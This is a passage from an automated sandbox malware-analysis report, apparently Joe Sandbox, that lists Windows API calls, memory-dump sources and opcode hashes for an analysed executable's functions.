                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                    APIs
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                    • _wcslen.LIBCMT ref: 00449519
                                                    • _wcslen.LIBCMT ref: 00449526
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 2886238975-0
                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                    • String ID:
                                                    • API String ID: 1792727568-0
                                                    • Opcode ID: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                    • Opcode Fuzzy Hash: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                    APIs
                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                    • String ID: cdecl
                                                    • API String ID: 3850814276-3896280584
                                                    • Opcode ID: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                    • Opcode Fuzzy Hash: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                    APIs
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                    • _memmove.LIBCMT ref: 0046D475
                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 2502553879-0
                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00448C69
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                    • String ID:
                                                    • API String ID: 1358664141-0
                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                    • String ID:
                                                    • API String ID: 1187119602-0
                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1597257046-0
                                                    • Opcode ID: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                    • Opcode Fuzzy Hash: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                    • String ID:
                                                    • API String ID: 237123855-0
                                                    • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                    • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                    • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 3349847261-0
